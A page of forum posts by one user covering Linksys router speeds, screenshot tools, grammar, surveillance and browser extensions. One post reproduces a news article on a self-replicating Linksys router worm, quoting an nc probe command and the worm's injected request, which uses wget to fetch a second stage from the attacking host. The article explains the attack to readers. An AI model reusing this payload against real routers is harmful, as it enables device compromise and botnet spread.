topbanner_forum
  *

avatar image

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Thursday November 13, 2025, 3:11 pm
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Recent Posts

Pages: prev1 ... 123 124 125 126 127 [128] 129 130 131 132 133 ... 264next
3176
The Home Server Show[/b][/url] published an [url=http://homeservershow.com/building-your-own-super-router-with-pfsense-and-untangle.html]article...
Thanks!
3177
^ Yes, you're probably right - some kind of incompetence - but deliberately misleading too. Talking of which, I mentioned above that I had used the Linksys WRT120N. I had thought, from the box, that it would have been capable of up to 150Mbps. Not so, as this interesting and detailed technical analysis by smallnetbuilder.com explained: Not-So-Brilliant Disguise: Linksys By Cisco WRT120N Wireless-N Home Router Reviewed

The analysis is well worth a read.
Conclusion:
In case you missed it, Cisco didn't directly answer the question regarding expected speeds. But if you read carefully, you'll see that they are saying that the WRT120N is only certified to be interoperable at 802.11g speeds, i.e. 54 Mbps maximum link rate, even with Wi-Fi Certified Draft 11n devices.
On that basis alone, I just can't recommend the not-certified-for-draft-802.11n WRT120N, no matter how Cisco tries to disguise it.

So, Linksys/Cisco apparently deliberately sold a product that was known to be inferior to the deliberately implied superiority, and used technical obfuscation to conceal that fact and thus deliberately mislead the consumer.
How d'you like them apples?    :tellme:
3178
^^ +1 for what 40hz said.    :up:
Good link to the HNAP "Easy NOT EQUALS Secure" article.
So, why, one wonders, did UpNp get excommunicated and HNAP get invited in...?    :tellme:

Some people (not me, you understand) might say that maybe the NSA couldn't hack into peoples' routers easily enough using UpNp , so they and Cisco invented HNAP to do it, but I couldn't possibly comment.
3179
General Software Discussion / Re: ScreenShot Captor is a Mess
« Last post by IainB on February 14, 2014, 05:41 PM »
You should use PNG file format for screenshots.
It is far smaller than BMP and preserves all information including transparency (jpg degrades screenshots and has no transparency).
Doh! Yes, of course. Thankyou. I had forgotten that. That might also help to explain the inconsistent viewing in irfanview that I was describing above...
EDIT: Oh, no it doesn't. I was using two SC captures saved as .PNG files.
3180
Living Room / WARNING! Linksys routers infected with self-replicating worm/malware.
« Last post by IainB on February 14, 2014, 06:35 AM »
This could affect a lot of unsuspecting Linksys router users. (I used to use a Linksys WRT120N, which apparently could be a potential target for this worm.)

(ArsTchnica post copied below sans embedded hyperlinks/images.)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC

Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080

Devices that return the XML HNAP output may be vulnerable.

The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.

So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.

Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.

The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.

So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:

    The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1

Further Reading
Guerilla researcher created epic botnet to scan billions of IP addresses

With 9TB of data, survey is one of the most exhaustive—and illicit—ever done.
Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)

The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.

As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.

Article updated throughout to add newly available information.
3181
After reading the post (below) in 404 Tech Support, I downloaded and ran the latest version of Sysinternals' Process Explorer.
It's very nifty.
You just right-click on a process in the PE window and PE sends the hash of that process' file to VirusTotal.
A new column "VirusTotal" in the PE window says "Hash submitted...", and after VT returns its score for files of that hash, it displays the score - e.g., "0/50", meaning in this case that no virus checker of the 50 that tested this file found any virus/malware.
The VT score stays in the column whilst that process continues to run.
If you close and restart PE, the VT column for that same process is empty - which makes sense, because the score was for that process run at that previous point in time, and the process file could have been changed (would have a new hash) between starts.

The post has an image, some links and a YouTube demo of the thing described.
(Copied below sans embedded hyperlinks/images.)
Process Explorer now includes VirusTotal integration | 404 Tech Support
By Jason Hamilton on February 5, 2014 in Software

Last week, version 16 of Process Explorer was released and 16.01 was released yesterday. Its newest feature is VirusTotal integration. You use Process Explorer to examine the processes currently running on a Windows computer and now you can right-click on any process to upload it to VirusTotal to have it scanned by 40+ different antivirus scanners. You will then get the feedback on how many of those AV engines thought the file could be malicious. All from within Process Explorer.

The new version includes a new column for VirusTotal and a new entry on the context menu when you right-click on a process.

process explorer Process Explorer now includes VirusTotal integration

The first time you use the ‘Check VirusTotal’ function, you will be shown the Terms in your browser and a pop-up asking if you agree with the terms. After that, the process is hashed and submitted to VirusTotal. The column is then updated with the results to tell you how many of the virus scanners find the file to be malicious.

I made a quick screencast to demonstrate the new functionality.

Process Explorer could already be handy in cleaning a malware infection but this new feature makes it even better.
3182
General Software Discussion / Re: ScreenShot Captor is a Mess
« Last post by IainB on February 13, 2014, 07:31 PM »
SC has a feature that will remove those, and it is enabled by default when you use Alt+PrtScr to capture the active window.
You should should see the screen flash black and white while it captures that window, and it should remove them.
(that's assuming you haven't changed any options related to window transparency capture).
Are you capturing that window using Alt+PrtScr?
______________________________

I can attest to the fact that Alt+PrtScr woks as described, but sometimes, when viewed in irfanview, a SC capture image may seem to have the squared-off corners/outlines in grey (not black), and sometimes the exact same image (i.e., same file) will not have them - i.e. it is not always consistent.

Furthermore, it varies depending on whether the image is viewed against a light background or a dark background, but even then, in irfanview, it is not always consistent.

I think this may be a display-related (GPU?) rendering variability - some kind of a bug - but not necessarily a bug in SC.
3183
General Software Discussion / Re: ScreenShot Captor is a Mess
« Last post by IainB on February 13, 2014, 06:35 PM »
@longrun: I think I understand what you are saying there, but, as you quoted, please note that I did use the word "sometimes".
I was not speaking about people who were always like that. That would be a different kettle of fish.
3184
General Software Discussion / Re: ScreenShot Captor is a Mess
« Last post by IainB on February 13, 2014, 05:54 PM »
mouser and tomos:
You're far too gracious. Just ban this rude, profane, semi-literate ("re-leaves stress") person from the forum.
__________________________
Hahaha, very droll.
If you placed a ban on people who were sometimes "rude" or "profane" or "semi-literate" you might risk banning most of the members of this forum - including myself. Who amongst us, I wonder, can claim to have never been "rude" or "profane" or "semi-literate", either deliberately or inadvertently - i.e., without realising it?

Sure, tick them off for it, maybe - especially if they are serial offenders or don't seem to realise/care what their behaviours are - but, if they self-correct or apologise - as @PhoneyVirus seems to have done (above) - then fine. We're only fallible humans, after all.
A lot of people who use this forum probably do so because either they:
(a) require help/assistance on some matter, or
(b) have already received (a) and wish to return the favour and leave tracks to some useful/helpful knowledge gained.

Some time back I mulled over the idea of banning irrational people who (say) strung out or repeated 3 or more logical fallacies in a set of statements, but then I realised that to be irrational is human, and that (as E. De Bono put it) critical-rational thinking is a skill that we need to learn - for example, like learning to touch-type. Many of us are "two-fingered thinkers", as De Bono said.
So I dropped the idea of banning irrational people, as I realised that the people who (say) strung out or repeated 3 or more logical fallacies in a set of statements were arguably those most in need of help, and banning them was unlikely to help them to further evolve/develop their potential for critical-rational thinking skills. The best thing you could do seemed to be to simply and clearly point out the logical fallacies, as objectively as possible, and let the individual take from that the responsibility for doing some incremental work in the self-development department. As the old saying goes, "You can take a horse to water, but you can't make it drink".

When it comes to rants though , the idea of using delimiters for the rant seems quite useful - that is [RANT]...[/RANT] - as it also demonstrates that the writer acknowledges that they are ranting and wants to communicate that so there can be little misunderstanding.
3185
I so wish there was an English translation for everything.
There is. Open up any Chinese text HTML in Google Chrome and it will autotranslate for you. That's how I read every blog post re WizNote. I think you might be able to do the same with Bing, but have not tried it yet.
3186
Living Room / Re: Knight to queen's bishop 3 - Snowden charged with espionage.
« Last post by IainB on February 12, 2014, 04:58 AM »
Just read this post at easydns.org. I don't know if it is alarmist, but it seems pretty serious.
(Copied below sans embedded hyperlinks/images.)
YOU have a moral obligation to use crypto.
Written by Mark Jeftovic on February 11, 2014 — 5 Comments

Image: we_want_you_to_use_crypto

Today is The Day We Fight Back, a global initiative to send a message to our overlords that we're not thrilled about being spied on, subject to mass surveillance and basically living in an Orwellian nightmare.

Ordinarily we're not big "joiners" or "petition pushers", we think taking action has more efficacy. However, this is in it's own way doing just that. It is simply unfathomable to me how low on people's radar this issue is.

When the first revelations began surfacing that the NSA had basically implemented a surveillance state, I commented privately "just wait, eventually it will come out that Canada is doing the same thing".

Sure enough, reports started to surface about CSEC's activities, first engaging in industrial espionage against trading partners and then more recently, setting up wifi honeypots in Canadian airports to track Canadian citizens.

What surprised me was the lack of reaction from the populace here about this latest revelation. Trust me: this isn't just about an experiment in an airport tracking metadata, it's just the tip of the iceberg.

A lot of people like using us because we're not in the USA, and some of the rationalizations behind that perceived benefit still hold true: somewhat saner copyright laws (at least for the moment), not being wimps when it comes to idiotic takedown requests, et al.

But the idea that we are somehow "out of reach of the NSA" is definitely not one of them. Sure, we're not actively collaborating with them, as many US businesses are, but as we've said before: we just assume the pipes going into and out of our major network exchange points are being vacuumed en masse.

That's why we recently rolled out GPG encrypted email forwarding and will soon make it available on easyMail where it can encrypt your IMAP mailboxes. It's why we're going to spin out a personal privacy appliance fairly soon.

Because signing petitions is all well and good,  the anarcho-libertarian in me (not speaking for the entire company, or then again maybe I am) suspects that the political system we live under here in the "the Globalized World Order" is more or less bankrupt, corrupt and has lost all legitimacy to rule. It doesn't matter if next election one political party says "we're going to conduct a review of our intelligence agencies" and the other one says "we'll have a full public inquiry!". That's not a choice. There hasn't been real choice in the political menu in decades. So citizens can scream as loud as they want that "this is wrong!", it isn't going to sway our overlords from the current path.

That's why it's up to all of us to do it ourselves: start using crypto, take a look at things like bitcoin. Become hard to surveil, not because you're "doing nothing wrong", but because the government is.
________________________

I don't know that "Today is The Day We Fight Back" though. It looks rather like it was a non-event.
Maybe there's little appetite left to fight the Monster State.
3187
You might find Notefrog Tea quite handy: http://m8e.com/
The same cryptography method is employed within the Notefrog clipboard information manager (as reviewed on the DC Forum).
3188
Living Room / Re: A Point About Grammar
« Last post by IainB on February 12, 2014, 02:39 AM »
I was actually just going with liquid and solid (ice at bottom of photo) for a total of 2.
I did not however see any lakes in the photo. ;)
OK, as I recall from my fisics edukation, any substance (such as water) that can go from vapour<-->liquid<-->solid at different temps/pressures is said to be going through "phases". So water in liquid and ice form would be examples of two phases of water, by definition.

Presumably, all bottled water is for drinking, so you could call this "bottled potable water". Some bottled water might come from mineral springs with dissolved minerals, and these can be called "waters" per the above Concise Oxford Dictionary definition (and also as mentioned here in DCF), and some bottled water might be distilled water (pure H20 condensate from a distillation process). You could call these "different types" of water.
The plastic bottled water reputedly could contain BPn compounds from the plastic manufacturing process, so you might call these potentially "contaminated" or "polluted" types of potable water. Water is a universal solvent, and thus not all water is potable as it could contain all manner of harmful-to-health dissolved chemicals. Water also can contain bacteria that is dangerous to human health and this would usually not be potable either. All water on the planet is recycled water.

Then there's tap water. Oddly enough, this is the water that has been shown to be the safest to bottle and drink in urbanised societies, from a human health standpoint, because it has been mucked about with quite a lot before it runs out of the tap. It is water that has been filtered using various filters including insoluble aluminium compounds to flock/trap particulates in suspension, and then contaminated (treated) with a small amount of dissolved toxic/poisonous gas - chlorine - to sterilise the water. Some urban water also has an added toxin - stannous fluoride (a compound of the metal tin) which scientists tell us is good for our teeth by helping to reduce the incidence of decay.

The most beneficial potable water from a human health standpoint would be water containing lots of useful (to the human organism) dissolved minerals (so, for example, dissolved toxic lead minerals would make it not potable, by definition), and the least beneficial would be pure distilled water.

Some people reckon that the nicest-tasting water is that used to water down a glass of whisky, whereas others say that it spoils the taste of the whisky.

Water is the cause of the greatest solvent abuse and addiction on the planet, and causes many deaths. People can't seem to live without having to imbibe large amounts of it every day, and inhaling the stuff can be fatal.
3189
Living Room / Re: A Point About Grammar
« Last post by IainB on February 11, 2014, 02:35 PM »
How many different waters do you see in this photo?
 (see attachment in previous post)
_____________________________
Two?   :huh:
_____________________________
Agreed. Two waters strikes me as correct also. :D
_____________________________

I'm not sure there is necessarily a "correct" answer here. The answer would probably differ depending on how you defined "waters":

From Concise Oxford Dictionary (10th Ed.)
water
· n.
1 the liquid which forms the seas, lakes, rivers, and rain and is the basis of the fluids of living organisms. [Chemical formula: H2O.] Ø one of the four elements in ancient and medieval philosophy and in astrology. Ø (the waters) the water of a mineral spring as used medicinally. Ø a solution of a specified substance in water: ammonia water. Ø urine. Ø (waters) amniotic fluid, especially as discharged shortly before birth.
2 (the water) a stretch of water, such as a river, sea, or lake. Ø the surface of this. Ø [as modifier] found in, on, or near the water. Ø (waters) an area of sea regarded as under the jurisdiction of a particular country.
3 the quality of transparency and brilliance shown by a diamond or other gem.
4 Finance capital stock which represents a book value greater than the true assets of a company.
· v.
1 pour water over (a plant or an area of ground). Ø give a drink of water to (an animal). Ø take a fresh supply of water on board (a ship or steam train).
2 (of the eyes or mouth) produce tears or saliva.
3 dilute (a drink, typically an alcoholic one) with water. Ø (water something down) make something less forceful or controversial by changing or leaving out certain details.
4 (of a river) flow through (an area).
5 Finance increase (a company’s debt, or nominal capital) by the issue of new shares without a corresponding addition to assets.
– PHRASES like water in great quantities. make water (of a ship or boat) take in water through a leak. of the first water 1 (of a diamond or pearl) of the greatest brilliance and transparency. 2 referring to a person or thing unsurpassed of their kind: she was a bore of the first water. under water submerged; flooded. the water of life whisky. water on the brain informal hydrocephalus. water under the bridge (or N. Amer. water over the dam) past events that are over and done with.
– DERIVATIVES waterer n. waterless adj.
– ORIGIN OE wæter (n.), wæterian (v.), of Gmc origin.
3190
Living Room / Re: A Point About Grammar
« Last post by IainB on February 10, 2014, 11:17 PM »
...They might then have a news story from somewhere in the UK where, because it's Scotland, Yorkshire, etc, you have to wonder wtf they saying even though it's meant to be English.
Speaking as a Yorkshireman, I think you will find that Yorkshire-English is recognised as being an example of having a sort of English dialect, though I am unsure as to how many people actually use the dialect - e.g., "Put wood i'th 'ole." meaning "Put the wood in the hole" (i.e., "Close the door").

Most of the time, what you hear in the news is probably just English spoken with a strong Yorkshire (or, in the case of Scotland, Scottish) accent.
Another example of a dialect could be Cockney rhyming slang (from London).
There was a time when all radio and TV presenters and announcers on the BBC radio/TV were trained to speak a standardised and clear form of English based on "received English", and it gave rise to what became commonly known as "BBC Midlands English", but the new mantra has become "diversity", so now it seems that anything goes, no matter how incomprehensible, and the the thicker the better. I must admit I think some of the regional accents are very interesting and easy on the ear, but it doesn't surprise me if people sometimes say that they can't understand what is being said.
If you listen to BBC Cymru (Wales) you will hear spoken not English, but an entirely different language - Welsh - which is incomprehensible to those who have never learned to speak Welsh, though it has adopted many modern English words, but puts its own slant/emphasis on them.
3191
Living Room / Re: silly humor - post 'em here! [warning some NSFW and adult content]
« Last post by IainB on February 10, 2014, 06:44 PM »
3192
Living Room / Re: A Point About Grammar
« Last post by IainB on February 10, 2014, 05:26 PM »
...The accents really are that bad. They can be heard just fine...but they must be translated for those unfamiliar with the tendency to jumble an entire sentence into a single (somewhat long) "word"...
Gosh, then the language has become rather like a local dialect. Mind you, American-English is arguably a dialect of received English anyway.
3193
Living Room / Re: good Videos [short films] here :)
« Last post by IainB on February 10, 2014, 02:21 PM »
One of the main things that I find useful about this discussion thread is that someone has taken the trouble to watch a video clip/short film and, finding it worthwhile for whatever reason, posts it here - thereby doing me a favour. In the main, the vids posted tend to be pretty good. I would probably rarely watch such vids otherwise, as I despair of having to wade through the usual mass of mediocrity to find the odd one worth watching. For the same reason, I rarely watch TV.

To try to return the favour: I stumbled upon a no-strings-attached "video channel aggregator" the other day and, out of interest, stayed up late for a while, watching its short films channel - 5by.com.
It's not too bad, and included the video "Ruin" that @panzer linked to in a superb list that he provided -  here.
3194
Living Room / Re: A Point About Grammar
« Last post by IainB on February 10, 2014, 01:28 PM »
...Hell man we're in "The South" grammar is so far gone here "the yokels" get close captioned on the history/discovery channel...
If that were true, then I would suggest that the captions might be for the hard of hearing.
If it were not true, then it's a very droll remark.
3195
Living Room / Re: Knight to queen's bishop 3 - Snowden charged with espionage.
« Last post by IainB on February 09, 2014, 09:28 PM »
Awesome! :Thmbsup: (both for the argument and use of the word 'defenestration') 8)
I think the analysis is spot on even if I'm not sufficiently sanguine as to agree about the inevitability of his conclusion.
Some people (not me, you understand) might say that defenestration would be too good for some of these "gatekeepers" and their ilk, and that being put on the rack and then being hung, drawn and quartered would be more fitting for their oppressive crimes, but I couldn't possibly comment.

I'm none too sanguine about the outcome either.
3196
Living Room / The Internet and the defenestration of the gatekeepers
« Last post by IainB on February 09, 2014, 05:25 PM »
Very thought-provoking post from Quotulatiousness.ca:
(Copied below sans embedded hyperlinks/images.)
The Internet and the defenestration of the gatekeepers
February 5, 2014
Filed under: Government, Liberty, Technology — Tags: EdwardSnowden, Internet, Propaganda — Nicholas Russon @ 08:51

In the latest Libertarian Enterprise, L. Neil Smith talks about the recent movie The Fifth Estate, prominent whistleblowers, and how the Internet upset so many top-down information models:

    The top three “whistle-blowers”, of course, in no particular order, are Assange himself, Bradley/Chelsea Manning, and Edward Snowden. I’m interested in these individuals for a number of reasons, not the least of which, is that I wrote about them (actually, I anticipated them) long before most people in the world ever knew they existed.

    Including me.

    Eleven years ago, in a speech I delivered to the Libertarian Party of New Mexico entitled “Empire of Lies“, I asserted that every human being on Earth is swimming — drowning — in an ocean of lies, mostly told by governments of one variety or another. I pointed out that lies of that kind — for example, the Gulf of Tonkin “incident” that never happened, and yet cost the lives of 60,000 Americans and 2,000,000 Vietnamese — are deadly. I proposed, therefore, that any politician, bureaucrat, or policeman caught telling a lie to any member of the public for any reason — a well as any among their ilk keeping secrets — ought to be subject to capital punishment, preferably by public hanging.

    On network television.

    Some time later, I stumbled on what I think is the true historical significance of the Internet. For as long as human beings have been communicating with one another, except among family and friends (and even then, sometimes) communications have been vertical and one-way, from the top down. Just to take it back to the Middle Ages, you can’t talk back to, or argue with a church bell. You either do what you are trained to do when it rings — wake, pray, eat, go to bed — or you do not, and suffer whatever consequences society has arranged for you to suffer.

    This sorry situation was not improved materially by later “great” inventions like the printing press, movies, radio, or television. Such innovations only made it easier and more convenient to issue orders. The elite laid down the law to the peons (that’s us) and there was no way of contradicting them. Letters to the Editor are limited to 400 words.

    But the Internet, and all of the technical, political, and social phenomena associated with it, turned this communications hierarchy sideways. Almost overnight, it was now possible for anybody on the planet to talk to anybody else, and to speak privately with a single individual, or to millions, without obtaining anyone’s permission, judged not by their power or authority, but by the cogency of their arguments.

    Atlas didn’t shrug, Authority wigged.

    Traditional Big Media, newspaper, magazine, and book publishers, movie studios, radio and television network executives, held onto their monopoly gatekeeper position, inherited from a more primitive era, desperately and at any cost. Only they were fit to judge what word could be sent by mere individuals to the Great Unwashed (that’s us, again). What it cost them is their very existence. They were incapable of divining that the Age of Authority, including theirs, was over.

    For governments all over the world, subsisting as they all do on lies, intimidation, and violence, it was a nightmare. They have tried to fight back, but they will lose. The tide of history is against them. The idea of “peer-to-peer” communication is out there, and — short of the mass slaughter some of them seem to be preparing against us: a measure of their utter despair — it can never be called back or contained.
3197
General Software Discussion / Re: PowerPro development to cease this month
« Last post by IainB on February 09, 2014, 05:29 AM »
Still developing and in ß too.
Currently, at http://powerpro.webeddie.com
3198
General Software Discussion / Re: Firefox Extensions: Your favorite or most useful
« Last post by IainB on February 09, 2014, 04:29 AM »
Just posted for cross-reference and completeness:
@jity2: just stumbled upon this thread whilst searching DC Forum for references to Yahoo! Pipes.

To get what you want I use an alternative that I always use for sites that do not have an RSS feed but that I want to keep informed by (and no, I don't want email alerts) - it's a nifty Firefox extension called UpdateScanner

EDIT 2014-03-06: Link is now moved to Firefox add-ons: https://addons.mozil...ddon/update-scanner/
I suggest you try it out (assuming that you haven't tried it out already).

Also check: monitor and notify of webpage updates
3199
@jity2: just stumbled upon this thread whilst searching DC Forum for references to Yahoo! Pipes.

To get what you want I use an alternative that I always use for sites that do not have an RSS feed but that I want to keep informed by (and no, I don't want email alerts) - it's a nifty Firefox extension called UpdateScanner

EDIT 2014-03-06: Link is now moved to Firefox add-ons: https://addons.mozil...ddon/update-scanner/
I suggest you try it out (assuming that you haven't tried it out already).

Also check: monitor and notify of webpage updates
3200
OIC. Very similar colours to the XP Rose theme - per this screenshot. (I guess you can find it in the OS settings yourself.)

(Click to enlarge image.)

xplorer² - Desktop XP Rose theme 20091024 221901.jpg
Pages: prev1 ... 123 124 125 126 127 [128] 129 130 131 132 133 ... 264next